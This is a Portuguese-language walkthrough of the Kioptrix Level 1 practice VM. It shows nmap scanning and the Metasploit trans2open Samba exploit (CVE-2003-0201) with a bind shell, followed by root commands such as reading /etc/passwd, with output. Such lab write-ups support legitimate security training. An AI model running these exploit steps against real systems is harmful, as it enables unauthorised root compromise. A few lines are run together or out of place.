
Relatório do Kioptrix Nível 1 - CVE-2003-0201 Samba trans2open
Relatório do Kioptrix Level 1 - CVE-2003-0201 Samba trans2open
Autor: Amirbek Raxmatullayev (@americo_444)
Data: 2026-06-17
Plataforma: VulnHub
Dificuldade: Iniciante
Objetivo: Obter acesso root
| Componente | Detalhes |
|---|---|
| SO Anfitrião | Ubuntu 26.04 |
| Hipervisor | QEMU/KVM |
| Alvo | Kioptrix Level 1 (VMDK) |
| IP do Atacante | 192.168.56.1 |
| IP do Alvo | 192.168.56.101 |
Nota: O VirtualBox era incompatível com o kernel 7.0.0-22-generic devido a um conflito de namespace DKMS KVM. Migrei para QEMU/KVM e carreguei o VMDK diretamente, sem conversão.
qemu-system-x86_64 \
-m 512 \
-drive file="Kioptix Level 1.vmdk",format=vmdk \
-netdev bridge,id=net0,br=virbr0 \
-device e1000,netdev=net0 \
-display gtk
nmap -sn 192.168.56.0/24
Resultado: Alvo identificado em 192.168.56.101
nmap -sV -sC -p- 192.168.56.101
Portas Abertas:
msfconsole -q -x "use auxiliary/scanner/smb/smb_version; \
set RHOSTS 192.168.56.101; run; exit"
Resultado: Samba 2.2.1a — versão criticamente vulnerável confirmada.
Descrição:
As versões 2.2.x do Samba contêm uma vulnerabilidade de estouro de buffer baseado em pilha na função trans2open. Isso permite que um atacante remoto não autenticado execute código arbitrário como root.
Versões Afetadas: Samba 2.0.x — 2.2.8
Pontuação CVSS: 10.0 (Crítico)
Módulo de Exploração: exploit/linux/samba/trans2open
msfconsole
use exploit/linux/samba/trans2open
set RHOSTS 192.168.56.101
set LHOST 192.168.56.1
set PAYLOAD linux/x86/shell_bind_tcp
run
Por que bind_tcp em vez de reverse_tcp?
O payload reverse_tcp falhou porque a VM Kioptrix não conseguia alcançar o atacante através da configuração NAT/bridge. Com bind_tcp, o atacante se conecta ao alvo — nenhuma conexão de saída é necessária da vítima.
[*] Started bind TCP handler against 192.168.56.101:4444
[*] Trying return address 0xbffffdfc...
[*] Trying return address 0xbffffcfc...
...
[*] Command shell session 1 opened (192.168.56.1:36733 -> 192.168.56.101:4444)
Shell obtido! ✅
whoami
# root
id
# uid=0(root) gid=0(root) groups=99(nobody)
hostname
# kioptrix.level1
uname -a
# Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
cat /etc/passwd
# root:x:0:0:root:/root:/bin/bash
# john:x:500:500::/home/john:/bin/bash
# harold:x:500:500::/home/harold:/bin/bash
Informações do Sistema:
[Attacker: 192.168.56.1]
|
| Step 1: nmap full port scan
v
[Target: 192.168.56.101]
|
| Step 2: Samba 2.2.1a identified
v
[Metasploit — trans2open exploit]
|
| Step 3: Stack buffer overflow triggered
v
[Bind shell opened on port 4444]
|
| Step 4: whoami = root
v
[TARGET PWNED]
nmap -sV -sCbind_tcp e reverse_tcp e quando usar cada um| Ferramenta | Propósito |
|---|---|
| nmap | Varredura de portas, detecção de serviços/versões |
| Metasploit Framework | Enumeração SMB, exploração |
| QEMU/KVM | Virtualização do laboratório |
| arp-scan | Descoberta de hosts |
Escrito por Amirbek Raxmatullayev | BEK Coders Security Research | 2026
| Porta | Serviço | Versão |
|---|
| 22/tcp | SSH | OpenSSH 2.9p2 |
| 80/tcp | HTTP | Apache 1.3.20 |
| 111/tcp | RPC | rpcbind 2 |
| 139/tcp | SMB | Samba 2.2.1a |
| 443/tcp | HTTPS | mod_ssl/2.8.4 |
| 32768/tcp | Status | RPC #100024 |